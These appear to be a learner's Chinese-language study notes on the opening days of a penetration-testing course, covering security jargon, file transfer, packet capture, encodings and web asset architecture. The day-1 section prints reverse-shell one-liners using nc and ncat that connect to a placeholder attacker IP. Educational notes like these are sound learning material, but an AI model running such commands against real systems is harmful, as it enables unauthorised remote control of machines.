小迪安全网络攻防V2022全栈培训-基础入门
1
前言·
之前看过20年的小迪的一两集课程,没坚持下来,希望这次一定;一共178集(隔天一集),一集大概1个半小时,一共265小时
V2022-1版,与其盗版贩卖,不如公开学习,暂不提供课件环境资源等,请理解!
先生大义!
相比上一期120集有所增加
第1天:基础入门-操作系统&名词&文件·
比如POC等等大概理解作用但不知道其定义,不熟悉 验证 证明漏洞存在
EXP 利用 更关心
Payload :包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码
**shellcode **漏洞利用载荷/代码()
后门/webshell(web系统的后门)
木马(控制、操作、窃取)/病毒(破坏性)
反弹,回显,跳板,黑白盒测试,ATT&CK
ATT&CK 渗透测试流程标准框架 专有名词 写报告用
操作系统
用途 个人&服务器用机Server
命令 Win&Linux命令
命令不会讲 自己学 挺好的,自己学过了 后期用的时候上网查即可
权限 文件 服务 用户
用户 系统级 用户组
防火墙 出入站策略协议 iptables WAF
案例1 文件上传下载–解决无图形化&数据传输·
Linux: wget curl python ruby perl java等
Windows:PowerShell
[~]#棱角 ::Edge.Forum* (ywhack.com)
进入对方服务器,只有命令行,如何下载准备好的脚本(己方服务器)~]#棱角 :文件下载命令快捷生成
哈哈,这个文件下载,和想象的黑客更接近了
案例2 反弹shell命令–解决数据回显&交互式问答·
执行命令有回显 显示执行结果
passwd user 提示输入密码
综合案例1 防火墙绕过–正向连接&反向连接&内网服务器·
外网有公网IP地址,而内网只在局域网内有效,故外网连接不到内网
nc 瑞士军刀
此时小迪演示的有三台机子:普通的内网win10,aliyun_小迪,小迪8
普通nc测试:普通的内网win10,aliyun_小迪(双向)
防火墙测试:aliyun_小迪,小迪8
以下是一个简单的反弹 shell 的示例过程(来自GPT):
-
攻击者在自己控制的服务器上启动 nc 监听一个指定的端口,等待目标计算机的连接。
1
nc -l -p <port>
-
攻击者在目标计算机上执行命令(给出cmd权限),连接到攻击者控制的服务器。
1
nc <attacker_ip> <port> -e /bin/bash
-
目标计算机上的 nc 连接到攻击者控制的服务器,并将目标计算机上的 shell(如 Bash)的输入和输出重定向到该连接中。
-
现在,攻击者可以在自己的服务器上执行命令,并将其发送到目标计算机上的 shell 中。这样,攻击者就可以远程控制目标计算机并执行各种操作。
在命令
ncat -e /bin/bash ip port
中,/bin/bash
的作用是指定要在目标计算机上执行的命令。加上/bin/bash
表示要在目标计算机上启动一个交互式的 Bash shell。如果省略
/bin/bash
,则ncat -e ip port
命令将在目标计算机上执行默认的命令解释器(通常是/bin/sh
或/bin/dash
)。这不会启动一个交互式的 shell,而是在连接建立后执行一个简单的命令解释器。-------(GPT)
防火墙:一般入站检测严格,出战宽松 所以nc作为攻击者的主机要关闭防火墙
nc -e cmd ip port ||| nc -lvvp port
正向是自己主动找别人,反向是别人主动连接你【相对概念】
学习记录3-正向连接&反向连接 - 一肚子回锅肉 - 博客园 (cnblogs.com)
反弹shell
最后展示了pikachu的实战 FOFA 看着实战 打开新大陆 哈哈
第2天:基础入门-Web应用&架构搭建·
先花了十几分钟介绍了一下域名和服务器的购买,跳过【网站搭建:域名,子域名,DNS,HTTPS,证书】
WEB架构:开发语言、程序源码(应用类型,开源CMS分类,开发框架)、中间件容器(IIS、Apache、Nginx、Tomcat)、数据库类型(Mysql,Oracle,db2,Redis)、服务器操作系统、第三方软件(phpMYADMIN)
哈哈,不讲啊不懂,讲啊浪费时间
WEB应用安全漏洞分类:
SQL注入、文件安全、RCE执行、XSS跨站、CSRF/SSRF/CRLF、反序列化、逻辑越权、未授权访问、XXE/XML、弱口令安全
HTTP协议数据包简单总结 - cherry_cui - 博客园 (cnblogs.com)
通过新闻点赞按钮,引入抓包
只是禁止了浏览器的点赞,但是数据包的发送依旧有效(刷赞哈哈) 这个不需要用户登录
接下来打开了逍遥模拟器,讲解了由于UA造成的网站的不同呈现
看课的最大的好处,就是有学习路线和避免在细枝末节上耗费过多的时间
Burpsuite:浏览器-代理-服务器 127.0.0.1 8888
模拟器(相当于虚拟机,设置手动代理)用的是:192.168.1.9 自己的ip (物理机ip作为模拟器的出口)【桥接网卡 网段】
状态码 303 403
铸剑WebPathBrute 目录扫描 / Burp Intruder positions Payload Positions
快代理 远程代理 隧道代理 (封ip 薅羊毛)
好家伙 搭(建)网站听成了打网站
域名解析 例如:test.域名 设置指向的ip地址
第3天:基础入门-抓包&封包&协议&AP·
抓包 应用意义、对象、协议、支持
封包 应用意义
学会不同对象(ip、域名、应用程序)采用不同抓包封包抓取技术分析
- 基于网络接口抓包
- 基于程序进程抓包
- 基于数据协议抓包–HTTP/S&TCP&UDP
- 基于应用对象抓包-APP&小程序&PC_UI
- 基于系统使用抓包–模拟器&WIN&LINUX
浏览器 审查-自带的Network 有相应数据包信息及资源信息(Web网页)
APP&小程序&PC抓包HTTP/S软件:Charles茶杯&Fiddler&BP
程序进程&网络接口&其他协议抓包:Wireshark&科来网络分析系统
通讯类应用封包分析发送接收:WPE四件套封包&科来网络分析系统
环境配置:
安卓模拟器:逍遥
工具证书配置(能抓HTTPS的网站) 找到以太网的ip地址
封包抓取调试
Charles茶杯、Fiddler:模拟器;数据包需要筛选
Burp:实时点对点 类似上面格式的HTTP history;可以直接做安全测试
接下来又展示了微信小程序、PC软件的抓包
有些软件抓不到,其他协议 tcpdump无图形化界面,暂时讲课不讲,先使用无脑些的工具
Wireshark:需要了解过滤器
科来网络分析系统:能直接进程浏览器锁定到软件,协议分类
借用模拟器游戏的回城发包 引入封包监听工具 用于重复发送数据包 整体测试触发事件的数据包
CCProxy WPE
抓包目的:我还以为是分析、利用数据包;抓包应用的资产信息进行安全测试
抓包协议区别工具:有些不走HTTP/S,实现全局协议抓包
封包、抓包区别:零散和整体,封包能精确到每个操作的数据包
有些不是游戏加密,而是数据包反重发,反调试
第4天:基础入门-30余种加密编码进制·
案例:
- ZZCMS MD5:代码审计之zzcms - 先知社区 (aliyun.com)
- Discuz:MD5&SALT
识别加密算法/编码类型:
- 看加密方式:密文位数+密文特征(数字、字母、大小写、符号)
- 密文存放位置/加密对象(Web、数据库、操作系统)
应用:各类应用密文、自定义算法、代码分析、CTF
经过一道SQL注入题,主要是获得其中的PHP文件,观察编码特征,了解到了先要base64解码,然后AES解密(相关参数在代码中)
常见传输编码:
-
Base64(包括小写字母a-z、大写字母A-Z、数字0-9、符号"+“、”/"一共64个字符的字符集 可能=结尾)
-
URL(%0-9 a-f)
-
HEX(0-9,a-f)
-
ASCII(128位)
解密反编译工具:Zend&Dll&Jar
编码举例: 例如url上参数MQ== base64解码后为1 即id=1 || 目的:攻击者须根据加密规则构造Payload
如果在入门学习网络安全时,遇到一些名词或工具,应当去先搜索博客尽力搞懂吗(不影响此时内容的学习)
代码加密:
前端加密:JS颜文字、Jother ! + ( ) [ ] { }、JSFUCK 少了 { } 目的:版权保护
那如何解决二次开发的问题呢
后端代码加密:
PHP:乱码 头部有信息 php免费在线解密-PHP在线解密 (dephp.net)
.NET:DLL封装代码文件 ILSpy工具
JAVA:JAR&CLASS文件
工具:ILSpy、Zend、IDEA
数据库加密:mysql
显示编码:ANSI UTF-8 GBK
一道杂项 图片foremost 压缩包 颜文字aaencode
另一道 JSFUCK HTML里直接写的有
第5天:基础入门-资产架构&端口&应用·
资产架构:端口&目录&插件接口&多站点&多应用
- WEB单个源码指向安全
- WEB多个目录源码安全 www.domain/blog
- WEB多个端口源码安全 www.domain:8081
- 服务器架设多个站点安全 blog.domain
- 架设第三方插件接口安全 web源码插件、应用(phpmyadmin:方便了数据库的管理和被攻击/FTP:文件操作、FTP协议攻击)
- 服务器架设多个应用安全
番外安全:Aliyun&域名解析&云服务器&个人等
- 基于域名解析安全 社工等方式窃取账号 密码
- 基于服务器本身安全
- 基于服务商信息安全
- 基于管理个人的安全
看完之后感觉自己站起来了,能挖洞了,不是的,还有防护啊
又菜又懒
考虑阻碍:站库分离&部署防护&负载均衡&CDN等
- 站库分离 数据库部署到另一个服务器上
- CDN加速服务
- 负载均衡 防止一台服务器的崩溃
- 部署防护WAF应用防火墙
同一地区的网络宽带,有人下载过某个文件,另一个人再下的就是前一个的缓存,速度非常快;CDN本是为了解决网络通讯的数据问题(对于攻击者只是攻击的缓存,而非真实ip)
Nginx反向代理:内网的服务解析到外网服务器上 DNS 通讯